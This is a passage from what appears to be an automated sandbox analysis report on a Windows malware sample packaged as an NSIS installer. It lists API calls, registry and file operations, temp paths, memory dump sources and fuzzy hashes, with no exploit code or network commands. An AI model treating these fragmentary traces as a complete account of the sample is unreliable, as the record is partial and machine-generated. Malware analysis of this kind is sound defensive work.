                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll
                                                                                                                        • API String ID: 2531174081-1132853986

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • ReadFile.KERNELBASE(?,?,?,?), ref: 0040275D
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 00402798
                                                                                                                        • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 004027BB
                                                                                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 004027D1
                                                                                                                          • Part of subcall function 004060F2: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00406108
                                                                                                                        • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 0040287D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                                        • String ID: 9
                                                                                                                        • API String ID: 163830602-2366072709

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$wsprintf
                                                                                                                        • String ID: ... %d%%
                                                                                                                        • API String ID: 551687249-2449383134

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004068BC
                                                                                                                        • wsprintfW.USER32 ref: 004068F7
                                                                                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040690B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                                        • String ID: %s%S.dll$UXTHEME
                                                                                                                        • API String ID: 2200240437-1106614640

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • RegEnumValueW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,00100020,?,?,?), ref: 00402F02
                                                                                                                        • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402F4E
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F57
                                                                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402F6E
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402F79
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseEnum$DeleteValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1354259210-0

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 70591BFF: GlobalFree.KERNEL32(?), ref: 70591E74
                                                                                                                          • Part of subcall function 70591BFF: GlobalFree.KERNEL32(?), ref: 70591E79
                                                                                                                          • Part of subcall function 70591BFF: GlobalFree.KERNEL32(?), ref: 70591E7E
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 705918C5
                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 7059194B
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 70591970
                                                                                                                          • Part of subcall function 7059243E: GlobalAlloc.KERNEL32(00000040,?), ref: 7059246F
                                                                                                                          • Part of subcall function 70592810: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70591896,00000000), ref: 705928E0
                                                                                                                          • Part of subcall function 70591666: wsprintfW.USER32 ref: 70591694
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72590322272.0000000070591000.00000020.00000001.01000000.00000004.sdmp, Offset: 70590000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72590238197.0000000070590000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000000.00000002.72590417653.0000000070594000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        • Associated: 00000000.00000002.72590494752.0000000070596000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_70590000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3962662361-3916222277
                                                                                                                        • Opcode ID: 45ed69a1a92220e79e0cc401c604a956b51a2cf19d84702c7c39318d805e1292
                                                                                                                        • Instruction ID: 2ed620f12ae23405c80220a87eb45692be8b231c92311613f7df58bc5ed9bdf0
                                                                                                                        • Opcode Fuzzy Hash: 45ed69a1a92220e79e0cc401c604a956b51a2cf19d84702c7c39318d805e1292
                                                                                                                        • Instruction Fuzzy Hash: E041B2728202159FDB119F30DD8DB9D3FACAF04354F15446AF90BAE286DB749884DB6C

                                                                                                                        Control-flow Graph

                                                                                                                        • Executed
                                                                                                                        • Not Executed
                                                                                                                        control_flow_graph 846 406040-40604c 847 40604d-406081 GetTickCount GetTempFileNameW 846->847 848 406090-406092 847->848 849 406083-406085 847->849 851 40608a-40608d 848->851 849->847 850 406087 849->850 850->851
                                                                                                                        APIs
                                                                                                                        • GetTickCount.KERNEL32 ref: 0040605E
                                                                                                                        • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004034FA,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037E6), ref: 00406079
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CountFileNameTempTick
                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                                        • API String ID: 1716503409-944333549
                                                                                                                        • Opcode ID: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                        • Instruction ID: 4304e6ca34acc2e603ac9508cdf3fa98200610ac432ccd05af3fd9fdb7d66135
                                                                                                                        • Opcode Fuzzy Hash: 017de5c5da22b1c6cf72d7a8a287ef2c48f88e3ac937424cf3c6df762bd8e462
                                                                                                                        • Instruction Fuzzy Hash: 58F09676B40204FBDB10CF55ED05F9EB7ACEB95750F11403AEE05F7140E6B099548768
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe"), ref: 00405EA9
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                                                          • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                                                        • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                                                          • Part of subcall function 00405A75: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\polaritets,?,00000000,000000F0), ref: 00401652
                                                                                                                        Strings
                                                                                                                        • C:\Users\user\polaritets, xrefs: 00401645
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                        • String ID: C:\Users\user\polaritets
                                                                                                                        • API String ID: 1892508949-1397053051
                                                                                                                        • Opcode ID: 4b68a463cc784b1945903bcff3764fd9da93cf801788bc1ee3673f5490bf8ecc
                                                                                                                        • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                                                                                        • Opcode Fuzzy Hash: 4b68a463cc784b1945903bcff3764fd9da93cf801788bc1ee3673f5490bf8ecc
                                                                                                                        • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.KERNELBASE(?,00000000,00000000,?,?,00000800,00000000,?,?,?,?,Call,?,00000000,00406660,80000002), ref: 00406435
                                                                                                                        • RegCloseKey.KERNELBASE(?), ref: 00406440
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseQueryValue
                                                                                                                        • String ID: Call
                                                                                                                        • API String ID: 3356406503-1824292864
                                                                                                                        • Opcode ID: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                        • Instruction ID: 441e6d046e2572fd66e4c77006f0a98464fe89a944563537cf106c849ea921cc
                                                                                                                        • Opcode Fuzzy Hash: 5e421e957683aa7155fe1e1f393967b6404614e05e15b89e99e168e2dc4a01c3
                                                                                                                        • Instruction Fuzzy Hash: 4F017172500209ABDF218F51CD05EDB3BA9EB54354F01403AFD1992191D738D968DF94
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                                                        • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                                                                                        • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                                                        • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                                                        • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                                                                                        • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                                                        • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                                                        • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                                                                                                                        • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                                                        • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.72564732244.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564935969.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72564997912.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.72565234736.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                                                        • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                                                                                                                        • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                                                        • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108
                                                                                                                          • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                                                          • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                                                          • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                                                          • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nst8185.tmp\System.dll), ref: 00405613
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                                                          • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
                                                                                                                        • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                        APIs
                                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                                                                                                        • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Global$AllocFree
                                                                                                                        • String ID: Call
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,C:\Users\user\AppData\Local\Temp\nst8185.tmp,C:\Users\user\AppData\Local\Temp\nst8185.tmp, 44v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76343420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                                                          • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                                                        • lstrlenW.KERNEL32 ref: 00402344
                                                                                                                        • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                                                                                                        • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1486964399-0
                                                                                                                        • Opcode ID: c92c3ee3ae18d95aa1771da2fabd1cb2010788539e6b4ab8b952707b1b2048dc
                                                                                                                        • Instruction ID: e570f7e88bbeadde5f19d209a5805755c0aba3de4ac721a8bb04e236ab5037c1
                                                                                                                        • Opcode Fuzzy Hash: c92c3ee3ae18d95aa1771da2fabd1cb2010788539e6b4ab8b952707b1b2048dc
                                                                                                                        • Instruction Fuzzy Hash: 93117071D00318AADB10EFF9DD09A9EB6B8AF14308F10443FA401FB2D1D6BCC9418B59
                                                                                                                        APIs
                                                                                                                        • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                                                                        • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: Enum$CloseValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 397863658-0
                                                                                                                        • Opcode ID: ba34c4ace152f4771e18115f26e31f873f7731feb8842bd8527d51c3f02d9afa
                                                                                                                        • Instruction ID: fdeb1b79bd1b5feb028a75c257e649ad2cddb418c0fd83a6570d1db0005c2465
                                                                                                                        • Opcode Fuzzy Hash: ba34c4ace152f4771e18115f26e31f873f7731feb8842bd8527d51c3f02d9afa
                                                                                                                        • Instruction Fuzzy Hash: 7D017171904205BFEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                                                                                        APIs
                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                                                        • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nst8185.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseQueryValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3356406503-0
                                                                                                                        • Opcode ID: 56531dfc69c8a788bac7fcb245dee4885a6b683f52a9ec3ede9407be23b67ed3
                                                                                                                        • Instruction ID: b0e4e1b430255f92fa12a8c2637aeeefdc8d450e0dea4cce8f1fdd2cec8de2f5
                                                                                                                        • Opcode Fuzzy Hash: 56531dfc69c8a788bac7fcb245dee4885a6b683f52a9ec3ede9407be23b67ed3
                                                                                                                        • Instruction Fuzzy Hash: 61116A71900219EBDF14DFA0DA989AEB7B4BF04349F20447FE406B62C0D7B84A45EB5E
                                                                                                                        APIs
                                                                                                                        • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                        • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: MessageSend
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3850602802-0
                                                                                                                        • Opcode ID: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                        • Instruction ID: 2b867b2a322a557ec20ecaa395e060e0be7e2a6973b32d365fcb6e947ad1390c
                                                                                                                        • Opcode Fuzzy Hash: 24120cd7971efbcf380a3cfcf85aef56aa5faf56da28ec4d1ccb8bb0957475b6
                                                                                                                        • Instruction Fuzzy Hash: 9E01F4327242209BE7195B389D05B6B3798E710314F10863FF855F66F1DA78CC429B4C
                                                                                                                        APIs
                                                                                                                        • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040245B
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00402464
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.72564829892.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseDeleteValue
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2831762973-0
                                                                                                                        • Opcode ID: 729ecf5bba26eed59db8e40ba0825d20aa39ecfc350fd83ab66bb719c7a4b8e3
                                                                                                                        • Instruction ID: 823524eaaa32c5521ce5516f6f818df3cdafdbc5371ac3c1d9ba599ed9425974
